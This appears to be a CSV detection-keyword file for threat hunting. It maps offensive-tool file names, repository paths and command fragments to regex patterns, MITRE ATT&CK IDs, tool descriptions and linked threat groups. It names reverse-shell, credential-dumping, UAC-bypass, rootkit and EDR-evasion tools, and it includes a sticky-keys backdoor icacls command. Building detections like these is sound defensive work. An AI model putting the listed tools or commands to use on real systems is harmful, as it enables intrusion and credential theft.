"*icacls c:\windows\system32\sethc.exe*",".{0,1000}icacls\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","48154"
"*icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant ""everyone"":(OI)(CI)M*",".{0,1000}icacls\.exe\sC\:\\ProgramData\\Oracle\\Java\\\.oracle_jre_usage\s\/grant\s\""everyone\""\:\(OI\)\(CI\)M.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","48156"
"*ICAgICAgIF9fICAgXyBfXyAgICAgICAgX18gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXyAKICBfX18gLyAvICAoXykgL19fX19fIF8vIC9fX19fIF8gIF9fXyBfX19fIF8gIF9fXyAgX19fIF8oXykKIChfLTwvIF8gXC8gLyAgJ18vIF8gYC8gX18vIF8gYC8gLyBfIGAvIF8gYC8gLyBfIFwvIF8gYC8gLyAKL19fXy9fLy9fL18vXy9cX1xcXyxfL1xfXy9cXyxfLyAgXF8sIC9cXyxfLyAvXy8vXy9cXyxfL18vICAKPT09PT09*",".{0,1000}ICAgICAgIF9fICAgXyBfXyAgICAgICAgX18gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXyAKICBfX18gLyAvICAoXykgL19fX19fIF8vIC9fX19fIF8gIF9fXyBfX19fIF8gIF9fXyAgX19fIF8oXykKIChfLTwvIF8gXC8gLyAgJ18vIF8gYC8gX18vIF8gYC8gLyBfIGAvIF8gYC8gLyBfIFwvIF8gYC8gLyAKL19fXy9fLy9fL18vXy9cX1xcXyxfL1xfXy9cXyxfLyAgXF8sIC9cXyxfLyAvXy8vXy9cXyxfL18vICAKPT09PT09.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","48158"
"*icebreaker:P@ssword123456*",".{0,1000}icebreaker\:P\@ssword123456.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48159"
"*icebreaker-master.zip*",".{0,1000}icebreaker\-master\.zip.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48160"
"*icebreaker-scan.xml*",".{0,1000}icebreaker\-scan\.xml.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48161"
"*IcebreakerSecurity/DelegationBOF*",".{0,1000}IcebreakerSecurity\/DelegationBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","48162"
"*IcebreakerSecurity/DelegationBOF*",".{0,1000}IcebreakerSecurity\/DelegationBOF.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","48163"
"*IcebreakerSecurity/PersistBOF*",".{0,1000}IcebreakerSecurity\/PersistBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","48164"
"*ice-wzl/wmiexec2*",".{0,1000}ice\-wzl\/wmiexec2.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","48165"
"*icmpBackdoor*",".{0,1000}icmpBackdoor.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","48166"
"*ICMP-ReceiveFile.py*",".{0,1000}ICMP\-ReceiveFile\.py.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","48167"
"*Icmp-Redirect.py*",".{0,1000}Icmp\-Redirect\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","48168"
"*ICMP-SendFile.py*",".{0,1000}ICMP\-SendFile\.py.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","48169"
"*icmpsh.exe*",".{0,1000}icmpsh\.exe.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48170"
"*icmpsh.exe*",".{0,1000}icmpsh\.exe.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","48171"
"*icmpsh.git*",".{0,1000}icmpsh\.git.{0,1000}","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","N/A","10","10","1573","415","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z","48172"
"*icmpsh_m.py*",".{0,1000}icmpsh_m\.py.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48173"
"*icmpsh_m.py*",".{0,1000}icmpsh_m\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","48174"
"*icmpsh-m.*",".{0,1000}icmpsh\-m\..{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48175"
"*icmpsh-m.c*",".{0,1000}icmpsh\-m\.c.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","48176"
"*icmpsh-m.pl*",".{0,1000}icmpsh\-m\.pl.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","48177"
"*icmpsh-master*",".{0,1000}icmpsh\-master.{0,1000}","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","N/A","10","10","1573","415","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z","48178"
"*icmpsh-s.*",".{0,1000}icmpsh\-s\..{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48179"
"*icmptunnel*",".{0,1000}icmptunnel.{0,1000}","offensive_tool_keyword","icmptunnel","icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. The IP traffic is sent in the 'data' field of ICMP packets.","T1041 - T1001 - T1570","TA0011","N/A","N/A","Defense Evasion","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","48180"
"*icyguider/DumpNParse*",".{0,1000}icyguider\/DumpNParse.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","1","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","48181"
"*icyguider/LatLoader*",".{0,1000}icyguider\/LatLoader.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","1","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","48182"
"*icyguider/LightsOut*",".{0,1000}icyguider\/LightsOut.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","10","4","321","44","2024-07-15T21:29:16Z","2023-06-01T14:57:44Z","48183"
"*icyguider/Shhhloader*",".{0,1000}icyguider\/Shhhloader.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","48184"
"*icyguider/UAC-BOF-Bonanza*",".{0,1000}icyguider\/UAC\-BOF\-Bonanza.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","48185"
"*id::modify*",".{0,1000}id\:\:modify.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","48186"
"*IDiagnosticProfileUAC.git*",".{0,1000}IDiagnosticProfileUAC\.git.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","48188"
"*IDiagnosticProfileUAC-main*",".{0,1000}IDiagnosticProfileUAC\-main.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","48189"
"*Idov31/Jormungandr*",".{0,1000}Idov31\/Jormungandr.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","48190"
"*Idov31/Nidhogg*",".{0,1000}Idov31\/Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","48191"
"*Idov31/Sandman*",".{0,1000}Idov31\/Sandman.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","48192"
"*idrac_default_pass.txt*",".{0,1000}idrac_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48193"
"*idrac_default_user.txt*",".{0,1000}idrac_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48194"
"*IDSyscall.exe*",".{0,1000}IDSyscall\.exe.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48195"
"*IDSyscall.sln*",".{0,1000}IDSyscall\.sln.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48196"
"*IDSyscall.vcxproj*",".{0,1000}IDSyscall\.vcxproj.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48197"
"*IDSyscall/IDSyscall*",".{0,1000}IDSyscall\/IDSyscall.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48198"
"*IDSyscall\IDSyscall*",".{0,1000}IDSyscall\\IDSyscall.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48199"
"*IE/Edge Grabber Begin*",".{0,1000}IE\/Edge\sGrabber\sBegin.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#content","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","48200"
"*ie_execcommand_uaf.rb*",".{0,1000}ie_execcommand_uaf\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48201"
"*ie_win_fakenotification-clippy*",".{0,1000}ie_win_fakenotification\-clippy.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","48202"
